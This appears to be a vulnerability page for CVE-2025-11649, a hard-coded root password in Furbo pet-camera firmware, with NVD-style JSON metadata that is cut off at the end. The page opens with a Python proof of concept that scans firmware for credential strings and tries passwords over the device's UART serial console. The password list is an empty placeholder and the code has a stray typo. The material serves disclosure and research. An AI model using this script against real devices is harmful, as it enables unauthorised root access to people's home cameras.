CVE-2025-11649

# CVE-2025-11649 - Furbo Hard-coded Password PoC # Reference: https://github.com/dead1nfluence/Furbo-Advisories/blob/main/Hardcoded-Password.md # Step 1: Extract firmware from device or download from official source # Furbo 360: FB0035_FW_036 # Furbo Mini: MC0020_FW_074 import hashlib import re import sys def extract_strings_from_firmware(firmware_path, min_length=6): """Extract printable strings from firmware binary for analysis""" strings = [] with open(firmware_path, 'rb') as f: data = f.read() # Find ASCII strings in binary pattern = rb'[\x20-\x7e]{%d,}' % min_length matches = re.findall(pattern, data) for match in matches: strings.append(match.decode('ascii', errors='ignore')) return strings def search_hardcoded_credentials(firmware_path): """Search for hard-coded credentials in firmware""" strings = extract_strings_from_firmware(firmware_path) # Common patterns for credentials credential_patterns = [ r'root[:\s]+\S+', r'admin[:\s]+\S+', r'password[:\s]+\S+', r'pass[:\s]+\S+', r'pwd[:\s]+\S+', ] found_credentials = [] for s in strings: for pattern in credential_patterns: matches = re.findall(pattern, s, re.IGNORECASE) if matches: found_credentials.extend(matches) return found_credentials def attempt_login_via_serial(port, baudrate=115200, username='root'): """ Attempt to login via serial console using hard-coded credentials Requires physical access to UART pins on the device """ try: import serial ser = serial.Serial(port, baudrate, timeout=5) # Wait for login prompt output = ser.read_until(b'login:', timeout=10) print(f"[*] Received: {output.decode(errors='ignore')}") # Send username ser.write(f"{username}\n".encode()) # Wait for password prompt output = ser.read_until(b'Password:', timeout=10) print(f"[*] Received: {output.decode(errors='ignore')}") # Try hard-coded passwords discovered from firmware analysis # NOTE: Actual passwords should be extracted from firmware binary hardcoded_passwords = [ # Placeholder - actual passwords extracted from firmware ]n for pwd in hardcoded_passwords: ser.write(f"{pwd}\n".encode()) output = ser.read(1024) if b'$' in output or b'#' in output: print(f"[+] SUCCESS! Logged in with password: {pwd}") return True ser.close() except ImportError: print("[-] pyserial not installed. Run: pip install pyserial") except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <firmware_binary>") print(f"Example: {sys.argv[0]} FB0035_FW_036.bin") sys.exit(1) firmware_path = sys.argv[1] print(f"[*] Analyzing firmware: {firmware_path}") creds = search_hardcoded_credentials(firmware_path) if creds: print(f"[+] Found {len(creds)} potential hard-coded credentials:") for c in creds: print(f" - {c}") else: print("[-] No obvious credentials found with simple patterns") print("[*] Try manual analysis with tools like binwalk, strings, or Ghidra")

{"cve": {"id": "CVE-2025-11649", "sourceIdentifier": "[email protected]", "published": "2025-10-12T23:15:32.687", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Tomofun Furbo 360 and Furbo Mini. The affected element is an unknown function of the component Root Account Handler. Performing manipulation results in use of hard-coded password. The attack must be initiated from a local position. The attack is considered to have high complexity. The exploitability is described as difficult. The exploit has been made public and could be used. The firmware versions determined to be affected are Furbo 360 up to FB0035_FW_036 and Furbo Mini up to MC0020_FW_074. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.4, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C", "baseScore": 6.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 1.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-255"}, {"lang": "en", "value": "CWE-259"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_mini_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "074", "matchCriteriaId": "06B19876-699B-455F-945F-AF26C60BF965"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_mini:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F549356-AF78-447C-8689-D9DD1A9202DC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_360_dog_camera_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "036", "matchCriteriaId": "6DDA1333-73CD-494A-8DD3-9543FDFD47A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_360_dog_camera:*:*:*:*:*:*:*:*", "matchCriteriaId": "08CA8E77-413F-4849-A110-49DB5DDA29C5 ... (truncated)